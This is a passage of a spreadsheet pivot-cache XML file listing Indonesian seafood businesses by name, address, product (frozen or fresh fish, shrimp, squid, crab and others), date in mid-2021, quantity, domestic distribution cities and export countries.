    <s v="Ikan Demersal Segar (Kerapu, Kakap Merah, Tenggiri)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Bitung, Kota Ternate"/>
    <s v="China, Korea, Democratic People's Republic of, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="25998"/>
    <x v="1249"/>
    <s v="KOPERASI NELAYAN SARUMA PESISIR JAYA"/>
    <s v="Desa Sayoang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Bitung, Kota Ternate"/>
    <s v="China, Korea, Democratic People's Republic of, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="25999"/>
    <x v="1249"/>
    <s v="KOPERASI NELAYAN SARUMA PESISIR JAYA"/>
    <s v="Desa Sayoang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Tongkol, Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Bitung, Kota Ternate"/>
    <s v="China, Korea, Democratic People's Republic of, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="26000"/>
    <x v="1249"/>
    <s v="KOPERASI NELAYAN SARUMA PESISIR JAYA"/>
    <s v="Desa Sayoang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Beku"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Bitung, Kota Ternate"/>
    <s v="China, Korea, Democratic People's Republic of, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="26001"/>
    <x v="1249"/>
    <s v="KOPERASI NELAYAN SARUMA PESISIR JAYA"/>
    <s v="Desa Sayoang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Segar"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Bitung, Kota Ternate"/>
    <s v="China, Korea, Democratic People's Republic of, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="26003"/>
    <x v="1143"/>
    <s v="PT. FISHINDO LINTAS SAMUDRA"/>
    <s v="Jl. Raya Margomulyo No.44, Suri Mulia Permai Blok NN No.01, Kel. Greges, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2021-06-18T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Semarang, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="26004"/>
    <x v="1143"/>
    <s v="PT. FISHINDO LINTAS SAMUDRA"/>
    <s v="Jl. Raya Margomulyo No.44, Suri Mulia Permai Blok NN No.01, Kel. Greges, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-06-18T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="26016"/>
    <x v="1250"/>
    <s v="UD. SEMANGAT BARU UNIT I"/>
    <s v="Jl. Acsess Road, Kel. Lalang, Kec. Medang Deras, Kabupaten Batu Bara&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Sarden, Selar, Aso-aso, Tenggiri)"/>
    <d v="2021-06-16T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Batu Bara, Kota Tanjung Balai, Kota Medan"/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="26017"/>
    <x v="1250"/>
    <s v="UD. SEMANGAT BARU UNIT I"/>
    <s v="Jl. Acsess Road, Kel. Lalang, Kec. Medang Deras, Kabupaten Batu Bara&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Segar (Kerapu, Jenaha, Bawal, Kakap)"/>
    <d v="2021-06-16T00:00:00"/>
    <n v="10000"/>
    <s v="Kabupaten Batu Bara, Kota Medan"/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="26018"/>
    <x v="1250"/>
    <s v="UD. SEMANGAT BARU UNIT I"/>
    <s v="Jl. Acsess Road, Kel. Lalang, Kec. Medang Deras, Kabupaten Batu Bara&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Segar"/>
    <d v="2021-06-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="26019"/>
    <x v="1250"/>
    <s v="UD. SEMANGAT BARU UNIT I"/>
    <s v="Jl. Acsess Road, Kel. Lalang, Kec. Medang Deras, Kabupaten Batu Bara&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-06-16T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Batu Bara"/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="26020"/>
    <x v="1250"/>
    <s v="UD. SEMANGAT BARU UNIT I"/>
    <s v="Jl. Acsess Road, Kel. Lalang, Kec. Medang Deras, Kabupaten Batu Bara&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Siput Segar"/>
    <d v="2021-06-16T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Batu Bara"/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="26021"/>
    <x v="1250"/>
    <s v="UD. SEMANGAT BARU UNIT I"/>
    <s v="Jl. Acsess Road, Kel. Lalang, Kec. Medang Deras, Kabupaten Batu Bara&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Segar"/>
    <d v="2021-06-16T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Batu Bara, Kota Medan"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="26025"/>
    <x v="1251"/>
    <s v="PT. BINTANG SAMUDERA AGRO TANI MAKMUR"/>
    <s v="Kawasan PPS Nizam Zachman Blok K 7D (Room 2), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Kembung, Lemadang, Layaran, Cakalang, Tenggiri, Salem)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang"/>
    <s v="Chile, China, India, Japan, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26026"/>
    <x v="1252"/>
    <s v="PT. BINTANG TIRTA SEMESTA"/>
    <s v="Kawasan PPS Nizam Zachman Blok K 7D (Room 3), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Barakuda, Kembung, Lemadang, Cakalang, Tenggiri, Salem)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bekasi, Kota Bogor, Kota Sukabumi, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="Chile, China, Japan, Korea, Democratic People's Republic of, Peru, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26050"/>
    <x v="1253"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Kima 9 Kav L No.7A, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="4200181"/>
    <s v="Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="26059"/>
    <x v="1254"/>
    <s v="PT. KARUNIA SAMUDERA HINDIA"/>
    <s v="Jl. Letjen Gatot Subroto No. 99, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kuring, Salem, Aso-aso, Layang, Cakalang)"/>
    <d v="2021-06-21T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Sibolga, Kota Padang, Kota Pekanbaru, Kabupaten Muaro Jambi, Kota Palembang, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="26060"/>
    <x v="1254"/>
    <s v="PT. KARUNIA SAMUDERA HINDIA"/>
    <s v="Jl. Letjen Gatot Subroto No. 99, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Mata Besar, Malong, Gulama, Kambing-kambing, Biji Nangka, Layur)"/>
    <d v="2021-06-21T00:00:00"/>
    <n v="1200000"/>
    <s v="Kota Sibolga, Kota Padang, Kota Pekanbaru, Kota Jambi, Kota Palembang, Kota Jakarta Utara, Kota Bogor"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="26061"/>
    <x v="1254"/>
    <s v="PT. KARUNIA SAMUDERA HINDIA"/>
    <s v="Jl. Letjen Gatot Subroto No. 99, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-06-21T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Sibolga, Kota Padang, Kota Pekanbaru, Kota Jambi, Kota Palembang, Kota Jakarta Utara, Kota Bogor"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="26062"/>
    <x v="1254"/>
    <s v="PT. KARUNIA SAMUDERA HINDIA"/>
    <s v="Jl. Letjen Gatot Subroto No. 99, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Scallop Beku"/>
    <d v="2021-06-21T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Sibolga, Kota Padang, Kota Pekanbaru, Kota Jambi, Kota Palembang, Kota Jakarta Utara, Kota Bogor"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="26063"/>
    <x v="1255"/>
    <s v="CV. SAMUDERA MARINE FISH"/>
    <s v="Jl. Letjen Gator Subroto No.99, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kuring, Salem, Selayang, Aso-aso, Cakalang)"/>
    <d v="2021-06-21T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Sibolga, Kota Pekanbaru, Kota Jambi, Kota Palembang, Kota Jakarta Utara, Kota Bogor"/>
    <m/>
  </r>
  <r>
    <n v="26064"/>
    <x v="1237"/>
    <s v="PT. ANDIRA INTERNUSA GEMILANG"/>
    <s v="Jl. Jawa Blok G-1, Kel. Ganda Mekar, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Kembung, Salem)"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="900000"/>
    <s v="Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="26065"/>
    <x v="1237"/>
    <s v="PT. ANDIRA INTERNUSA GEMILANG"/>
    <s v="Jl. Jawa Blok G-1, Kel. Ganda Mekar, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-06-24T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="26077"/>
    <x v="314"/>
    <s v="PT. NAILI OCEAN"/>
    <s v="Jl. Muara Baru Ujung Blok M No.1-2 (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Scallop Segar"/>
    <d v="2021-06-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan"/>
  </r>
  <r>
    <n v="26095"/>
    <x v="1256"/>
    <s v="PT. BERKAT MINA BAHARI TATURAN"/>
    <s v="Desa Taturan, Kec. Gemeh, Kabupaten Kepulauan Talaud&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Deho, Layang, Cakalang)"/>
    <d v="2021-06-21T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="26187"/>
    <x v="1242"/>
    <s v="PT. ANUGERAH MAPAN JAYA"/>
    <s v="Jl. Poros Kariango, Dusun Majannang, Kel. Kurusumange, Kec. Tanralili, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Semi Refined Carrageenan"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="1200000"/>
    <s v="Kota Palopo"/>
    <s v="Russian Federation, United States"/>
  </r>
  <r>
    <n v="26225"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26226"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Segar"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26227"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Barramundi, Kakap, Kaci-kaci, Beloso, Kurisi, Ayam-ayam, Bawal, Swanggi, Lencam, Sebelah, Manyung, Biji Nangka, Kerapu, Layur)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26228"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Segar"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26229"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tenggiri, Pedang)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="26230"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Teripang Segar"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26231"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Segar"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26232"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Segar"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26233"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26234"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26236"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Sidat Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26237"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Gelembung Ikan Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26238"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26239"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Air Tawar Beku (Lele, Mas, Gurami, Patin, Nila)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26240"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26241"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26242"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Layang, Cakalang, Tenggiri, Pedang)"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26243"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Teripang Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26244"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26245"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26246"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Pari Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26247"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26249"/>
    <x v="1257"/>
    <s v="PT. NAGA LAUT BERSINAR"/>
    <s v="Unit Pengepakan Ikan No.15A-16, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar"/>
    <d v="2021-07-01T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="26250"/>
    <x v="1258"/>
    <s v="CV. SEAFOOD SEJAHTERA PAPUA"/>
    <s v="Jl. Soponyono SP 4, Kel. Wonosari Jaya, Kec. Wania, Kabupaten Mimika&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Ikan Demersal Beku (Hitam)"/>
    <d v="2021-06-22T00:00:00"/>
    <m/>
    <s v="Kota Surabaya"/>
    <s v="China, Thailand"/>
  </r>
  <r>
    <n v="26251"/>
    <x v="1258"/>
    <s v="CV. SEAFOOD SEJAHTERA PAPUA"/>
    <s v="Jl. Soponyono SP 4, Kel. Wonosari Jaya, Kec. Wania, Kabupaten Mimika&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Ikan Pelagis Beku (Tongkol)"/>
    <d v="2021-06-22T00:00:00"/>
    <m/>
    <s v="Kota Surabaya"/>
    <s v="China, Thailand"/>
  </r>
  <r>
    <n v="26252"/>
    <x v="1258"/>
    <s v="CV. SEAFOOD SEJAHTERA PAPUA"/>
    <s v="Jl. Soponyono SP 4, Kel. Wonosari Jaya, Kec. Wania, Kabupaten Mimika&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Udang Beku"/>
    <d v="2021-06-22T00:00:00"/>
    <m/>
    <s v="Kota Surabaya"/>
    <s v="China, Thailand"/>
  </r>
  <r>
    <n v="26253"/>
    <x v="1258"/>
    <s v="CV. SEAFOOD SEJAHTERA PAPUA"/>
    <s v="Jl. Soponyono SP 4, Kel. Wonosari Jaya, Kec. Wania, Kabupaten Mimika&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Kepiting Segar"/>
    <d v="2021-06-22T00:00:00"/>
    <m/>
    <s v="Kota Surabaya"/>
    <s v="China, Thailand"/>
  </r>
  <r>
    <n v="26272"/>
    <x v="1251"/>
    <s v="PT. BINTANG SAMUDERA AGRO TANI MAKMUR"/>
    <s v="Kawasan PPS Nizam Zachman Blok K 7D (Room 2), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Kerapu, Layur, Halibut, Kakatua, Kakap)"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="150000"/>
